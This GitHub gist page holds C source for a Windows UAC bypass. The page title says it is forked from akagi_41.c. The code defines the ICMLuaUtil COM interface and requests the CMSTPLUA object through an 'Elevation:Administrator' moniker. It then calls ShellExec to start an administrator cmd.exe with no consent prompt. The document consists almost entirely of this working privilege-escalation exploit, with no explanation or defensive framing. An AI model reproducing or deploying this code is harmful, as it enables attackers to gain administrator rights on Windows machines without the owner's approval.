Skip to content

Instantly share code, notes, and snippets.

@api0cradle
Forked from hfiref0x/akagi_41.c
Created August 16, 2017 07:14
Show Gist options
  • Star 15 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save api0cradle/d4aaef39db0d845627d819b2b6b30512 to your computer and use it in GitHub Desktop.
Save api0cradle/d4aaef39db0d845627d819b2b6b30512 to your computer and use it in GitHub Desktop.
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in ICMLuaUtil * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *ShellExec)(
__RPC__in ICMLuaUtil * This,
_In_ LPCTSTR lpFile,
_In_opt_ LPCTSTR lpParameters,
_In_opt_ LPCTSTR lpDirectory,
_In_ ULONG fMask,
_In_ ULONG nShow
);
HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method12)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method13)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method14)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method15)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method16)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method17)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method18)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method19)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method20)(
__RPC__in ICMLuaUtil * This);
END_INTERFACE
} *PICMLuaUtilVtbl;
interface ICMLuaUtil
{
CONST_VTBL struct ICMLuaUtilVtbl *lpVtbl;
};
#define T_CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define T_IID_ICMLuaUtil L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"
VOID Method41_Test()
{
HRESULT r = E_FAIL;
BOOL bCond = FALSE;
IID xIID_ICMLuaUtil;
CLSID xCLSID_ICMLuaUtil;
ICMLuaUtil *CMLuaUtil = NULL;
BIND_OPTS3 bop;
WCHAR szElevationMoniker[MAX_PATH];
do {
if (CLSIDFromString(T_CLSID_CMSTPLUA, &xCLSID_ICMLuaUtil) != NOERROR) {
break;
}
if (IIDFromString(T_IID_ICMLuaUtil, &xIID_ICMLuaUtil) != S_OK) {
break;
}
RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker));
_strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
_strcat(szElevationMoniker, T_CLSID_CMSTPLUA);
RtlSecureZeroMemory(&bop, sizeof(bop));
bop.cbStruct = sizeof(bop);
bop.dwClassContext = CLSCTX_LOCAL_SERVER;
r = CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, &xIID_ICMLuaUtil, &CMLuaUtil);
if (r != S_OK) {
break;
}
r = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, L"C:\\windows\\system32\\cmd.exe", NULL, NULL, SEE_MASK_DEFAULT, SW_SHOW);
} while (bCond);
if (CMLuaUtil != NULL) {
CMLuaUtil->lpVtbl->Release(CMLuaUtil);
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment